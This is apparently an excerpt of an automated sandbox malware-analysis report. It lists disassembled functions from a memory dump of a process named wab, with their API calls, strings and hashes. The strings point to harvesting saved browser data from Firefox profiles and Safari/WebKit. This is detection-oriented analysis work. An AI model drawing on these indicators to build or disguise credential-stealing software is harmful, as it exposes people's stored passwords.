                      • Snapshot File: hcaresult_20_2_400000_wab.jbxd
                      Similarity
                      • API ID: Version
                      • String ID:
                      • API String ID: 1889659487-0
                      • Opcode ID: 65fe17fce0a62211919799e39ce3b7c1e35ae55805528a641db57f2e5b506d3e
                      • Instruction ID: 34334e4c1a53cba42546035453d5331cf18162d9798f59f763323439a3546438
                      • Opcode Fuzzy Hash: 65fe17fce0a62211919799e39ce3b7c1e35ae55805528a641db57f2e5b506d3e
                      • Instruction Fuzzy Hash: BAE0463590131CCFEB24DB34DB0B7C676F5AB08B46F0104F4C20AC2092D3789688CA2A
                      Function 004018C0 Relevance: 1.5, APIs: 1, Instructions: 6nativeCOMMON
                      Download Yara Rule
                      APIs
                      • NtdllDefWindowProc_W.NTDLL(?,?,?,?,00401B0D,?,?,?), ref: 004018D2
                      Memory Dump Source
                      • Source File: 00000014.00000002.1807424206.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_20_2_400000_wab.jbxd
                      Similarity
                      • API ID: NtdllProc_Window
                      • String ID:
                      • API String ID: 4255912815-0
                      • Opcode ID: 3de349333402391b5f3bd83c09a178b3b388cc2d8cda5cc5e9d51b86f8a07b54
                      • Instruction ID: 27e4c09127093a565ccbabfb03fa630377511b1425115cef73ae3fc8c8acf6c4
                      • Opcode Fuzzy Hash: 3de349333402391b5f3bd83c09a178b3b388cc2d8cda5cc5e9d51b86f8a07b54
                      • Instruction Fuzzy Hash: BEC0483A108200FFCA024B81DD08D0ABFA2BB98320F00C868B2AC0403187338022EB02
                      Function 00402279 Relevance: 110.5, APIs: 9, Strings: 54, Instructions: 285COMMON
                      Download Yara Rule
                      APIs
                      • _wcsicmp.MSVCRT ref: 004022A6
                      • _wcsicmp.MSVCRT ref: 004022D7
                      • _wcsicmp.MSVCRT ref: 00402305
                      • _wcsicmp.MSVCRT ref: 00402333
                        • Part of subcall function 0040AA29: wcslen.MSVCRT ref: 0040AA3C
                        • Part of subcall function 0040AA29: memcpy.MSVCRT ref: 0040AA5B
                      • memset.MSVCRT ref: 0040265F
                      • memcpy.MSVCRT ref: 0040269B
                        • Part of subcall function 00404423: GetProcAddress.KERNEL32(?,00000000), ref: 00404453
                        • Part of subcall function 00404423: FreeLibrary.KERNEL32(00000000,00000141,?,00000000,?,004026E9,?,?,00000000,?), ref: 00404476
                      • memcpy.MSVCRT ref: 004026FF
                      • LocalFree.KERNEL32(?,?,?,00000000,?,?,00000000,?), ref: 00402764
                      • FreeLibrary.KERNEL32(00000000,?,?,00000000,?), ref: 00402775
                      Strings
                      Memory Dump Source
                      • Source File: 00000014.00000002.1807424206.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_20_2_400000_wab.jbxd
                      Similarity
                      • API ID: _wcsicmp$Freememcpy$Library$AddressLocalProcmemsetwcslen
                      • String ID: !$#$$$&$&$'$)$/$0$2$8$=$>$>$@$A$Account$Data$F$H$H$I$K$K$L$O$Path$S$X$\$^$`$a$b$com.apple.Safari$com.apple.WebKit2WebProcess$g$h$n$n$q$server$t$t$t$u$u$w$y$y$z${$}$~
                      • API String ID: 577499730-1134094380
                      • Opcode ID: dd22fc70d251945153f84157bbedf09d5f9a0a96f25b2184ec3973dd1390e5a3
                      • Instruction ID: 24bcbd005531c38afe4d7004bd238553ea51a424b60caac2517de9c8923e7683
                      • Opcode Fuzzy Hash: dd22fc70d251945153f84157bbedf09d5f9a0a96f25b2184ec3973dd1390e5a3
                      • Instruction Fuzzy Hash: 8FE1F32010C7C19DD332D678884978BBFD45BA7328F484B9EF1E89A2D2D7B98509C767
                      Function 0040C87B Relevance: 54.5, APIs: 27, Strings: 4, Instructions: 285stringCOMMON
                      Download Yara Rule
                      APIs
                      Strings
                      Memory Dump Source
                      • Source File: 00000014.00000002.1807424206.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_20_2_400000_wab.jbxd
                      Similarity
                      • API ID: _wcsicmpmemset$_wcsnicmpwcslen$ByteCharMultiWidewcschrwcscpy$memcpystrchrstrlen
                      • String ID: :stringdata$ftp://$http://$https://
                      • API String ID: 2787044678-1921111777
                      • Opcode ID: 5cfdb451540a99f12352c14b787623eda213fcfbf47060a2a7a9031bc80669e4
                      • Instruction ID: 1dd8f84a331a8d1f0195812dc1f06ff326a48265e58e3ad24d859c5fcdf3acb9
                      • Opcode Fuzzy Hash: 5cfdb451540a99f12352c14b787623eda213fcfbf47060a2a7a9031bc80669e4
                      • Instruction Fuzzy Hash: C191C571540219AEEF10EF65DC82EEF776DEF41318F01016AF948B7181EA38ED518BA9
                      Function 00414002 Relevance: 49.3, APIs: 25, Strings: 3, Instructions: 265COMMON
                      Download Yara Rule
                      APIs
                      • GetDlgItem.USER32(?,000003E9), ref: 0041402F
                      • GetDlgItem.USER32(?,000003E8), ref: 0041403B
                      • GetWindowLongW.USER32(00000000,000000F0), ref: 0041404A
                      • GetWindowLongW.USER32(?,000000F0), ref: 00414056
                      • GetWindowLongW.USER32(00000000,000000EC), ref: 0041405F
                      • GetWindowLongW.USER32(?,000000EC), ref: 0041406B
                      • GetWindowRect.USER32(00000000,?), ref: 0041407D
                      • GetWindowRect.USER32(?,?), ref: 00414088
                      • MapWindowPoints.USER32(00000000,?,?,00000002), ref: 0041409C
                      • MapWindowPoints.USER32(00000000,?,?,00000002), ref: 004140AA
                      • GetDC.USER32 ref: 004140E3
                      • wcslen.MSVCRT ref: 00414123
                      • GetTextExtentPoint32W.GDI32(?,00000000,00000000,?), ref: 00414134
                      • ReleaseDC.USER32(?,?), ref: 00414181
                      • _snwprintf.MSVCRT ref: 00414244
                      • SetWindowTextW.USER32(?,?), ref: 00414258
                      • SetWindowTextW.USER32(?,00000000), ref: 00414276
                      • GetDlgItem.USER32(?,00000001), ref: 004142AC
                      • GetWindowRect.USER32(00000000,?), ref: 004142BC
                      • MapWindowPoints.USER32(00000000,?,?,00000002), ref: 004142CA
                      • GetClientRect.USER32(?,?), ref: 004142E1
                      • GetWindowRect.USER32(?,?), ref: 004142EB
                      • SetWindowPos.USER32(?,00000000,00000000,00000000,?,?,00000206), ref: 00414331
                      • GetClientRect.USER32(?,?), ref: 0041433B
                      • SetWindowPos.USER32(?,00000000,?,?,?,?,00000204), ref: 00414373
                      Strings
                      Memory Dump Source
                      • Source File: 00000014.00000002.1807424206.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_20_2_400000_wab.jbxd
                      Similarity
                      • API ID: Window$Rect$Long$ItemPointsText$Client$ExtentPoint32Release_snwprintfwcslen
                      • String ID: %s:$EDIT$STATIC
                      • API String ID: 2080319088-3046471546
                      • Opcode ID: 4cffa952f3a039c60e8efdb869f217de44d75a47fa5f06f0d0d0713d1b76c38a
                      • Instruction ID: eff71af8639f47ea0b7533f6321954d8b94ad3b67000e3ed03306cc56154d199
                      • Opcode Fuzzy Hash: 4cffa952f3a039c60e8efdb869f217de44d75a47fa5f06f0d0d0713d1b76c38a
                      • Instruction Fuzzy Hash: F8B1DF71108301AFD721DFA9C985E6BBBF9FF88704F004A2DF69582261DB75E9448F16
                      Function 004131DC Relevance: 42.2, APIs: 22, Strings: 2, Instructions: 214windowCOMMON
                      Download Yara Rule
                      APIs
                      • EndDialog.USER32(?,?), ref: 00413221
                      • GetDlgItem.USER32(?,000003EA), ref: 00413239
                      • SendMessageW.USER32(00000000,000000B1,00000000,0000FFFF), ref: 00413257
                      • SendMessageW.USER32(?,00000301,00000000,00000000), ref: 00413263
                      • SendMessageW.USER32(?,000000B1,00000000,00000000), ref: 0041326B
                      • memset.MSVCRT ref: 00413292
                      • memset.MSVCRT ref: 004132B4
                      • memset.MSVCRT ref: 004132CD
                      • memset.MSVCRT ref: 004132E1
                      • memset.MSVCRT ref: 004132FB
                      • memset.MSVCRT ref: 00413310
                      • GetCurrentProcess.KERNEL32 ref: 00413318
                      • ReadProcessMemory.KERNEL32(00000000,?,00000080,00000000), ref: 0041333B
                      • ReadProcessMemory.KERNEL32(?,?,00000080,00000000), ref: 0041336D
                      • memset.MSVCRT ref: 004133C0
                      • GetCurrentProcessId.KERNEL32 ref: 004133CE
                      • memcpy.MSVCRT ref: 004133FC
                      • wcscpy.MSVCRT ref: 0041341F
                      • _snwprintf.MSVCRT ref: 0041348E
                      • SetDlgItemTextW.USER32(?,000003EA,?), ref: 004134A6
                      • GetDlgItem.USER32(?,000003EA), ref: 004134B0
                      • SetFocus.USER32(00000000), ref: 004134B7
                      Strings
                      • Exception %8.8X at address %8.8X in module %sRegisters: EAX=%8.8X EBX=%8.8X ECX=%8.8X EDX=%8.8XESI=%8.8X EDI=%8.8X EBP=%8.8X, xrefs: 00413483
                      • {Unknown}, xrefs: 004132A6
                      Memory Dump Source
                      • Source File: 00000014.00000002.1807424206.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_20_2_400000_wab.jbxd
                      Similarity
                      • API ID: memset$Process$ItemMessageSend$CurrentMemoryRead$DialogFocusText_snwprintfmemcpywcscpy
                      • String ID: Exception %8.8X at address %8.8X in module %sRegisters: EAX=%8.8X EBX=%8.8X ECX=%8.8X EDX=%8.8XESI=%8.8X EDI=%8.8X EBP=%8.8X${Unknown}
                      • API String ID: 4111938811-1819279800
                      • Opcode ID: 97bbb4bd5fc40a2980dfba304632497cbec8fb91d9ab00b7ac9f2109681e0e22
                      • Instruction ID: fb691a4f2f0ee0f23db40d54bf7b3fb7beca904c55697b54c7815e943e903c38
                      • Opcode Fuzzy Hash: 97bbb4bd5fc40a2980dfba304632497cbec8fb91d9ab00b7ac9f2109681e0e22
                      • Instruction Fuzzy Hash: A97182B280021DBFEB219F51DC45EEA3B7CFB08355F0440B6F508A6161DB799E948F69
                      Function 00401198 Relevance: 39.2, APIs: 26, Instructions: 185COMMON
                      Download Yara Rule
                      APIs
                      • GetDlgItem.USER32(?,000003EC), ref: 004011F0
                      • ChildWindowFromPoint.USER32(?,?,?), ref: 00401202
                      • GetDlgItem.USER32(?,000003EE), ref: 00401238
                      • ChildWindowFromPoint.USER32(?,?,?), ref: 00401245
                      • GetDlgItem.USER32(?,000003EC), ref: 00401273
                      • ChildWindowFromPoint.USER32(?,?,?), ref: 00401285
                      • GetModuleHandleW.KERNEL32(00000000,?,?), ref: 0040128E
                      • LoadCursorW.USER32(00000000,00000067), ref: 00401297
                      • SetCursor.USER32(00000000,?,?), ref: 0040129E
                      • GetDlgItem.USER32(?,000003EE), ref: 004012BF
                      • ChildWindowFromPoint.USER32(?,?,?), ref: 004012CC
                      • GetDlgItem.USER32(?,000003EC), ref: 004012E6
                      • SetBkMode.GDI32(?,00000001), ref: 004012F2
                      • SetTextColor.GDI32(?,00C00000), ref: 00401300
                      • GetSysColorBrush.USER32(0000000F), ref: 00401308
                      • GetDlgItem.USER32(?,000003EE), ref: 00401329
                      • EndDialog.USER32(?,?), ref: 0040135E
                      • DeleteObject.GDI32(?), ref: 0040136A
                      • GetDlgItem.USER32(?,000003ED), ref: 0040138F
                      • ShowWindow.USER32(00000000), ref: 00401398
                      • GetDlgItem.USER32(?,000003EE), ref: 004013A4
                      • ShowWindow.USER32(00000000), ref: 004013A7
                      • SetDlgItemTextW.USER32(?,000003EE,0045D778), ref: 004013B8
                      • SetWindowTextW.USER32(?,00000000), ref: 004013CA
                      • SetDlgItemTextW.USER32(?,000003EA,?), ref: 004013E2
                      • SetDlgItemTextW.USER32(?,000003EC,?), ref: 004013F3
                      Memory Dump Source
                      • Source File: 00000014.00000002.1807424206.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_20_2_400000_wab.jbxd
                      Similarity
                      • API ID: Item$Window$Text$ChildFromPoint$ColorCursorShow$BrushDeleteDialogHandleLoadModeModuleObject
                      • String ID:
                      • API String ID: 829165378-0
                      • Opcode ID: 19a332b7149b8c9d9d3d6ff7d6a76f82ec59d5834f8b717de0dd62f1513d673f
                      • Instruction ID: caa3714a391556dce09a7e5fb0b25e31ef738818e6d8753142f97b5ec5ee2caf
                      • Opcode Fuzzy Hash: 19a332b7149b8c9d9d3d6ff7d6a76f82ec59d5834f8b717de0dd62f1513d673f
                      • Instruction Fuzzy Hash: 0051B134500708AFEB32AF61DC85E6E7BB9FB44301F10093AF552A61F1C7B9A991DB19
                      Function 0040414F Relevance: 35.1, APIs: 13, Strings: 7, Instructions: 145COMMON
                      Download Yara Rule
                      APIs
                      • memset.MSVCRT ref: 00404172
                        • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D29
                        • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D33
                        • Part of subcall function 00409D1F: wcscpy.MSVCRT ref: 00409D47
                        • Part of subcall function 00409D1F: wcscat.MSVCRT ref: 00409D55
                        • Part of subcall function 00409B98: GetFileAttributesW.KERNELBASE(?,00445E12,?,?,?,00000104), ref: 00409B9C
                      • wcscpy.MSVCRT ref: 004041D6
                      • wcscpy.MSVCRT ref: 004041E7
                      • memset.MSVCRT ref: 00404200
                      • memset.MSVCRT ref: 00404215
                      • _snwprintf.MSVCRT ref: 0040422F
                      • wcscpy.MSVCRT ref: 00404242
                      • memset.MSVCRT ref: 0040426E
                      • memset.MSVCRT ref: 004042CD
                      • memset.MSVCRT ref: 004042E2
                      • _snwprintf.MSVCRT ref: 004042FE
                      • wcscpy.MSVCRT ref: 00404311
                      Strings
                      Memory Dump Source
                      • Source File: 00000014.00000002.1807424206.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_20_2_400000_wab.jbxd
                      Similarity
                      • API ID: memset$wcscpy$_snwprintfwcslen$AttributesFilewcscat
                      • String ID: AE$General$IsRelative$Path$Profile%d$profiles.ini$EA
                      • API String ID: 2454223109-1580313836
                      • Opcode ID: 14b0d88d68d2695e792434069e0167c5559d7d25d781ac3d9655dfb0e2d65502
                      • Instruction ID: 5f54f20862f9259acc4f568515dc65a5c395277ecd0331c6beb9e3a358a2eb32
                      • Opcode Fuzzy Hash: 14b0d88d68d2695e792434069e0167c5559d7d25d781ac3d9655dfb0e2d65502
                      • Instruction Fuzzy Hash: 18512FB294012CBADB20EB55DC45ECFB7BCBF55744F0040E6B50CA2142EA795B84CFAA
                      Function 00411346 Relevance: 31.8, APIs: 13, Strings: 5, Instructions: 263windowregistryclipboardCOMMON
                      Download Yara Rule
                      APIs
                        • Part of subcall function 0040D407: LoadMenuW.USER32(00000000), ref: 0040D40F
                      • SetMenu.USER32(?,00000000), ref: 00411453
                      • SendMessageW.USER32(00000000,00000404,00000001,?), ref: 00411486
                      • GetModuleHandleW.KERNEL32(00000000), ref: 00411495
                      • LoadImageW.USER32(00000000,00000068,00000000,00000000,00000000,00009060), ref: 004114A2
                      • GetModuleHandleW.KERNEL32(00000000), ref: 004114D9
                      • CreateWindowExW.USER32(00000000,SysListView32,00000000,50810809,00000000,00000000,00000190,000000C8,?,00000103,00000000,00000000), ref: 00411500
                      • memcpy.MSVCRT ref: 004115C8
                      • ShowWindow.USER32(?,?), ref: 004115FE
                      • GetFileAttributesW.KERNEL32(0045E078), ref: 0041162F
                      • GetTempPathW.KERNEL32(00000104,0045E078), ref: 0041163F
                      • RegisterClipboardFormatW.USER32(commdlg_FindReplace), ref: 0041167A
                      • SendMessageW.USER32(?,00000404,00000002,?), ref: 004116B4
                      • SendMessageW.USER32(?,0000040B,00001001,00000000), ref: 004116C7
                        • Part of subcall function 00404592: wcslen.MSVCRT ref: 004045AF
                        • Part of subcall function 00404592: SendMessageW.USER32(?,00001061,?,?), ref: 004045D3
                      Strings
                      Memory Dump Source
                      • Source File: 00000014.00000002.1807424206.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_20_2_400000_wab.jbxd
                      Similarity
                      • API ID: MessageSend$HandleLoadMenuModuleWindow$AttributesClipboardCreateFileFormatImagePathRegisterShowTempmemcpywcslen
                      • String ID: /nosaveload$SysListView32$commdlg_FindReplace$report.html$xE
                      • API String ID: 4054529287-3175352466
                      • Opcode ID: 80e2c4da556a6dfda94225f517483429c905b521daebd2f44f7cad3fe39d77d4
                      • Instruction ID: 800f7bfcdfcb1fd3e7c20450dd8eb4425a557a8a4e928c852398501c1500280f
                      • Opcode Fuzzy Hash: 80e2c4da556a6dfda94225f517483429c905b521daebd2f44f7cad3fe39d77d4
                      • Instruction Fuzzy Hash: CBA1A271640388AFEB11DF69CC89FCA3FA5AF55304F0404B9FE48AF292C6B59548CB65
                      Function 00414F1E Relevance: 31.6, APIs: 12, Strings: 6, Instructions: 103COMMON
                      Download Yara Rule
                      APIs
                      Strings
                      Memory Dump Source
                      • Source File: 00000014.00000002.1807424206.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_20_2_400000_wab.jbxd
                      Similarity
                      • API ID: wcscat$_snwprintfmemset$wcscpy
                      • String ID: color="#%s"$ size="%d"$</b>$</font>$<b>$<font
                      • API String ID: 3143752011-1996832678
                      • Opcode ID: 054461c97bc12b3ac6a6f5d4f147efcfafa35783d9cb78a1f9dd62ddbda29cb0
                      • Instruction ID: fbd97de1ae08b3d7bb58c913f73a739646adbf5bc1eafa8de66ed769fffaada2
                      • Opcode Fuzzy Hash: 054461c97bc12b3ac6a6f5d4f147efcfafa35783d9cb78a1f9dd62ddbda29cb0
                      • Instruction Fuzzy Hash: 25310BB2500315BEE720AA55AC82DBF73BC9F81728F10815FF614621C2EB3C5A854A1D
                      Function 0041352F Relevance: 31.5, APIs: 9, Strings: 9, Instructions: 41libraryloaderCOMMON
                      Download Yara Rule
                      APIs
                      • GetModuleHandleW.KERNEL32(ntdll.dll,-00000108,0040DE02,?,000000FF,00000000,00000104), ref: 00413542
                      • GetProcAddress.KERNEL32(00000000,NtQuerySystemInformation), ref: 00413559
                      • GetProcAddress.KERNEL32(NtLoadDriver), ref: 0041356B
                      • GetProcAddress.KERNEL32(NtUnloadDriver), ref: 0041357D
                      • GetProcAddress.KERNEL32(NtOpenSymbolicLinkObject), ref: 0041358F
                      • GetProcAddress.KERNEL32(NtQuerySymbolicLinkObject), ref: 004135A1
                      • GetProcAddress.KERNEL32(NtQueryObject), ref: 004135B3
                      • GetProcAddress.KERNEL32(NtSuspendProcess), ref: 004135C5
                      • GetProcAddress.KERNEL32(NtResumeProcess), ref: 004135D7
                      Strings
                      Memory Dump Source
                      • Source File: 00000014.00000002.1807424206.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_20_2_400000_wab.jbxd
                      Similarity
                      • API ID: AddressProc$HandleModule
                      • String ID: NtLoadDriver$NtOpenSymbolicLinkObject$NtQueryObject$NtQuerySymbolicLinkObject$NtQuerySystemInformation$NtResumeProcess$NtSuspendProcess$NtUnloadDriver$ntdll.dll
                      • API String ID: 667068680-2887671607
                      • Opcode ID: 57b3ef5f97466978e1990f74adf29af07ff290b7ce4571feabf87054e0031f76
                      • Instruction ID: 8dd6b0f06cc06780b82abcfa5335c49c30c65db347d43124f897848efd9f6b7c
                      • Opcode Fuzzy Hash: 57b3ef5f97466978e1990f74adf29af07ff290b7ce4571feabf87054e0031f76
                      • Instruction Fuzzy Hash: 8C015E75D48324AACB339F75AD09A053FB1EF04797B1004B7A80492266DAF9815CDE4C
                      Function 0040FB5D Relevance: 29.9, APIs: 10, Strings: 7, Instructions: 185COMMON
                      Download Yara Rule
                      APIs
                      Strings
                      Memory Dump Source
                      • Source File: 00000014.00000002.1807424206.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_20_2_400000_wab.jbxd
                      Similarity
                      • API ID: _snwprintfmemset$wcscpy$wcscat
                      • String ID: bgcolor="%s"$ nowrap$&nbsp;$</table><p>$<font color="%s">%s</font>$<table border="1" cellpadding="5">$<tr><td%s nowrap><b>%s</b><td bgcolor=#%s%s>%s
                      • API String ID: 1607361635-601624466
                      • Opcode ID: 014fce8712d2099ed920d1c21251e5be9fb3fd75ebba54fa6feefa75023380bc
                      • Instruction ID: 75b7dc7a1ab43caf41f6bee0dc73fa500ed8492db64f50ed133d22c14cecb56c
                      • Opcode Fuzzy Hash: 014fce8712d2099ed920d1c21251e5be9fb3fd75ebba54fa6feefa75023380bc
                      • Instruction Fuzzy Hash: 09619F71900208BFDF25EF54CC86EAE7BB9FF44310F1040AAF805A7296DB399A59CB55
                      Function 0041019A Relevance: 28.1, APIs: 10, Strings: 6, Instructions: 122COMMON
                      Download Yara Rule
                      APIs
                      Strings
                      Memory Dump Source
                      • Source File: 00000014.00000002.1807424206.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_20_2_400000_wab.jbxd
                      Similarity
                      • API ID: _snwprintf$memset$wcscpy
                      • String ID: bgcolor="%s"$ width="%s"$</font>$<font color="%s">$<table border="1" cellpadding="5"><tr%s>$<th%s>%s%s%s
                      • API String ID: 2000436516-3842416460
                      • Opcode ID: 3adec529592eaa12cbb3371149c11df059df1660bb42a65f2cf1cf9995de4c18
                      • Instruction ID: 0effb7443b15cd0e53e626898d2c9f551e6481245c02f09bcd1282082c9ffe88
                      • Opcode Fuzzy Hash: 3adec529592eaa12cbb3371149c11df059df1660bb42a65f2cf1cf9995de4c18
                      • Instruction Fuzzy Hash: C74163B194021D7AEB20EF55DC46EEB73BCFF45304F0440ABB908A2141E7759B988F66
                      Function 004035AD Relevance: 27.1, APIs: 18, Instructions: 93windowCOMMON
                      Download Yara Rule
                      APIs
                        • Part of subcall function 0041083A: memset.MSVCRT ref: 0041087D
                        • Part of subcall function 0041083A: memset.MSVCRT ref: 00410892
                        • Part of subcall function 0041083A: GetWindowsDirectoryW.KERNEL32(?,00000104), ref: 004108A4
                        • Part of subcall function 0041083A: SHGetFileInfoW.SHELL32(?,00000000,?,000002B4,00004001), ref: 004108C2
                        • Part of subcall function 0041083A: SendMessageW.USER32(?,00001003,00000001,?), ref: 004108FF
                        • Part of subcall function 0041083A: SendMessageW.USER32(?,00001003,00000000,?), ref: 00410936
                        • Part of subcall function 0041083A: GetModuleHandleW.KERNEL32(00000000), ref: 00410951
                        • Part of subcall function 0041083A: LoadImageW.USER32(00000000,00000085,00000000,00000010,00000010,00001000), ref: 00410963
                        • Part of subcall function 0041083A: GetModuleHandleW.KERNEL32(00000000), ref: 0041096E
                        • Part of subcall function 0041083A: LoadImageW.USER32(00000000,00000086,00000000,00000010,00000010,00001000), ref: 00410980
                        • Part of subcall function 0041083A: GetSysColor.USER32(0000000F), ref: 00410999
                      • GetModuleHandleW.KERNEL32(00000000), ref: 004035BF
                      • LoadIconW.USER32(00000000,00000072), ref: 004035CA
                      • GetModuleHandleW.KERNEL32(00000000), ref: 004035DF
                      • LoadIconW.USER32(00000000,00000074), ref: 004035E4
                      • GetModuleHandleW.KERNEL32(00000000), ref: 004035F3
                      • LoadIconW.USER32(00000000,00000073), ref: 004035F8
                      • GetModuleHandleW.KERNEL32(00000000), ref: 00403607
                      • LoadIconW.USER32(00000000,00000075), ref: 0040360C
                      • GetModuleHandleW.KERNEL32(00000000), ref: 0040361B
                      • LoadIconW.USER32(00000000,0000006F), ref: 00403620
                      • GetModuleHandleW.KERNEL32(00000000), ref: 0040362F
                      • LoadIconW.USER32(00000000,00000076), ref: 00403634
                      • GetModuleHandleW.KERNEL32(00000000), ref: 00403643
                      • LoadIconW.USER32(00000000,00000077), ref: 00403648
                      • GetModuleHandleW.KERNEL32(00000000), ref: 00403657
                      • LoadIconW.USER32(00000000,00000070), ref: 0040365C
                      • GetModuleHandleW.KERNEL32(00000000), ref: 0040366B
                      • LoadIconW.USER32(00000000,00000078), ref: 00403670
                      Memory Dump Source
                      • Source File: 00000014.00000002.1807424206.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_20_2_400000_wab.jbxd
                      Similarity
                      • API ID: HandleLoadModule$Icon$ImageMessageSendmemset$ColorDirectoryFileInfoWindows
                      • String ID:
                      • API String ID: 1043902810-0
                      • Opcode ID: ba21586d26ed62a419f919be10df3ed56d69a9ff92c9ff52d971427a1ca70114
                      • Instruction ID: 42406aa8c1b655767e81280a563d2f976f29c17d6cb42a8b032fada3297a07e5
                      • Opcode Fuzzy Hash: ba21586d26ed62a419f919be10df3ed56d69a9ff92c9ff52d971427a1ca70114
                      • Instruction Fuzzy Hash: B1212EA0B857087AF63137B2DC4BF7B7A5EDF81B89F214410F35C990E0C9E6AC108929
                      Function 004447D9 Relevance: 26.4, APIs: 4, Strings: 11, Instructions: 139COMMON
                      Download Yara Rule
                      APIs
                      Strings
                      Memory Dump Source
                      • Source File: 00000014.00000002.1807424206.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_20_2_400000_wab.jbxd
                      Similarity
                      • API ID: ??2@??3@_snwprintfwcscpy
                      • String ID: %4.4X%4.4X$040904E4$CompanyName$FileDescription$FileVersion$InternalName$LegalCopyright$OriginalFileName$ProductName$ProductVersion$\VarFileInfo\Translation
                      • API String ID: 2899246560-1542517562
                      • Opcode ID: e17f1f04e88a4cb48931d1772d94f5796c3f29ffdcb1b521dadae3bcfb684220
                      • Instruction ID: ddb1140ba30d93f946c39142265044aeba6ebe712c4753dd77c76fa61262b17a
                      • Opcode Fuzzy Hash: e17f1f04e88a4cb48931d1772d94f5796c3f29ffdcb1b521dadae3bcfb684220
                      • Instruction Fuzzy Hash: 434127B2900218BAD704EFA1DC82DDEB7BCBF49305B110167BD05B3152DB78A655CBE8
                      Function 0040DBA7 Relevance: 24.6, APIs: 8, Strings: 6, Instructions: 95COMMON
                      Download Yara Rule
                      APIs
                      • memset.MSVCRT ref: 0040DBCD
                      • memset.MSVCRT ref: 0040DBE9
                        • Part of subcall function 00409BCA: GetModuleFileNameW.KERNEL32(00000000,00000000,00000104,0040DDBE,?,?,00000000,00000208,000000FF,00000000,00000104), ref: 00409BD5
                        • Part of subcall function 004447D9: ??2@YAPAXI@Z.MSVCRT ref: 0044480A
                        • Part of subcall function 004447D9: _snwprintf.MSVCRT ref: 0044488A
                        • Part of subcall function 004447D9: wcscpy.MSVCRT ref: 004448B4
                      • wcscpy.MSVCRT ref: 0040DC2D
                      • wcscpy.MSVCRT ref: 0040DC3C
                      • wcscpy.MSVCRT ref: 0040DC4C
                      • EnumResourceNamesW.KERNEL32(?,00000004,Function_0000D957,00000000), ref: 0040DCB1
                      • EnumResourceNamesW.KERNEL32(?,00000005,Function_0000D957,00000000), ref: 0040DCBB
                      • wcscpy.MSVCRT ref: 0040DCC3
                      Strings
                      Memory Dump Source
                      • Source File: 00000014.00000002.1807424206.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_20_2_400000_wab.jbxd
                      Similarity
                      • API ID: wcscpy$EnumNamesResourcememset$??2@FileModuleName_snwprintf
                      • String ID: RTL$TranslatorName$TranslatorURL$Version$general$strings
                      • API String ID: 3330709923-517860148
                      • Opcode ID: 8014600ebdaa413990019ca607550d51b11cce94ae1a09dd3fff3b2e07bb1862
                      • Instruction ID: fd1c33b42c1478e8908a3567a27dc6f764f3595523656020fa754494b197929d
                      • Opcode Fuzzy Hash: 8014600ebdaa413990019ca607550d51b11cce94ae1a09dd3fff3b2e07bb1862
                      • Instruction Fuzzy Hash: 2121ACB2D4021876D720B7929C46ECF7B6CAF41759F010477B90C72083DAB95B98CAAE
                      Function 00407FDF Relevance: 23.0, APIs: 11, Strings: 2, Instructions: 228COMMON
                      Download Yara Rule
                      APIs
                        • Part of subcall function 0040CC26: GetFileSize.KERNEL32(00000000,00000000,000003FF,?,00000000,0040B7D4,?,?,?,?,000003FF,?,?,?,00445FAE,?), ref: 0040CC44
                        • Part of subcall function 0040CC26: FindCloseChangeNotification.KERNELBASE(?,?,000000FF,0000FDE9), ref: 0040CC98
                        • Part of subcall function 0040CCF0: _wcsicmp.MSVCRT ref: 0040CD2A
                      • memset.MSVCRT ref: 0040806A
                      • memset.MSVCRT ref: 0040807F
                      • _wtoi.MSVCRT ref: 004081AF
                      • _wcsicmp.MSVCRT ref: 004081C3
                      • memset.MSVCRT ref: 004081E4
                      • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,0000012E,000000FF,?,000003FF,00000000,00000000,0000012E,00000000,0000012D,?,?,?,?,?), ref: 00408218
                      • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,?,000000FF,?,000003FF,00000000,00000000,?,?,?,?,?,?), ref: 0040822F
                      • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,?,000000FF,?,000003FF,00000000,00000000,?,?,?,?,?,?), ref: 00408246
